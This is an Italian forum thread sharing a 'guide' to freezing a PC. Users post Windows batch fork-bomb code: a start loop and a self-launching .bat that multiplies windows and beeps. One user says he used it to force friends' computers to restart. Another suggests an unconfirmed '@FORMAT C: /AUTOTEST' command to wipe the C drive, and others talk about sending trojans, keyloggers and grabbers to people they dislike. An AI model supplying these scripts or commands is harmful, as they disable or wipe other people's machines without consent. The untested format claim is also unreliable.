• Regolamento Macrocategoria DEV
    Prima di aprire un topic nella Macrocategoria DEV, è bene leggerne il suo regolamento. Sei un'azienda o un hosting/provider? Qui sono anche contenute informazioni per collaborare con Sciax2 ed ottenere l'accredito nella nostra community!

Guida Come Impallare il Pc in Semplici Mosse.

sei un lamer.-.. se studiavi il dos sapevi che bastava fare

:1
start
goto 1

e avivi start infiniti...
LAMER!
 
kevin stai calmino come ti accanisci su di lui se non lo sapeva glielo dicevi con calma
 
sei un lamer.-.. se studiavi il dos sapevi che bastava fare

:1
start
goto 1

e avivi start infiniti...
LAMER!

se studiavi il batch scoprivi che il codice che hai postato fa schifo e che gli start si aprono molto lentamente e che chiudendo il principale si chiusono tutti :Muhaha:
 
se studiavi il batch scoprivi che il codice che hai postato fa schifo e che gli start si aprono molto lentamente e che chiudendo il principale si chiusono tutti :Muhaha:

.-. mi prendi per scemo? xD

allora fai prima così:
-crei nome.bat

@echo off
start nome.bat
nome.bat
(apri il prompt e scrivi :copy con beep [invio] ctrl+g [invio] ctrl+z [invio] vai alla cartella dell'user copi il simbolino ottenuto e scrivi)
echo [simbolino]


Spento eh? ogni finestra aprirà 2 finestre che a loro volta ne apriranno 2 etc... e in piu ogni finestra fara 2 beep e chiudendo quella principale non risolvi nnt.
LO SO IL BATCH
 
Bravo Giulix, già lo conoscevo e ho fatto riavviare il computer di un bel po' di amici :P
Piu START insersci nel testo piu' finestre si apriranno e il pc tende ad impallarsi :-)
 
Boooh... Non riesco a capire tutti questi grazie.. E' un semplicissimo file bat che apre tante finestre del DOS (prompt dei comandi)... E' sicuramente semplice ed efficace, ma booohhhh...
Allora fate il solito @FORMAT C: /AUTOTEST che dovrebbe formattare il disco c senza chiedere conferma all'utente (per via del comando "autotest")...(mai testato di persona)...
Tutti i file batch (bat) vengono spacciati in internet come trojan..
Se cercate in google "creare trojan blocco note" troverete migliaia di finti "trojan" come questo...
Cmq è semplice e funzionale, ma mi sembra fin troppo semplice per ricevere tutti questi post di ringraziamento....
 
Boooh... Non riesco a capire tutti questi grazie.. E' un semplicissimo file bat che apre tante finestre del DOS (prompt dei comandi)... E' sicuramente semplice ed efficace, ma booohhhh...
Allora fate il solito @FORMAT C: /AUTOTEST che dovrebbe formattare il disco c senza chiedere conferma all'utente (per via del comando "autotest")...(mai testato di persona)...
Tutti i file batch (bat) vengono spacciati in internet come trojan..
Se cercate in google "creare trojan blocco note" troverete migliaia di finti "trojan" come questo...
Cmq è semplice e funzionale, ma mi sembra fin troppo semplice per ricevere tutti questi post di ringraziamento....
concordo e poi basta scrivere su youtube come fare impallare il pc ce ne sono a migliaia e poi credo che la fonte sia tua nn credo che ci voglia il miglior hack del mondo per creare una guida cosi e poi dico all'inizio hai scritto se volevamo creare virus ma era trpp difficile questo e un semplice coso col blokko note creare virus e un'altra cosa e poi sono molto piu dannifici

p.s.nn te la prendere giulix ho detto quello che penso nn ce lo con te ;)
 
OTTIMO TRUCCO X CHI NN LO CONOSCEVA ANCHE XKE QUESTO TRUCCO SI SA DA MOOLTI ANNI MAGARI ragazzi con 1flooder speciale Immeterete start cmq se odiate 1 amico nn ji inviate sta sempliciotta o gli invii 1 trojan o fai il lamer con key , grabber ecc ;)
 
conosco già infatti prima di aprire qualsiasi bat leggo prima il codice :ridicolo:
 
Lo so meglio di te il regolamento -.-

E comunque non la ho riaperta io dato che il messaggio precedente al mio è stato postato poche ore prima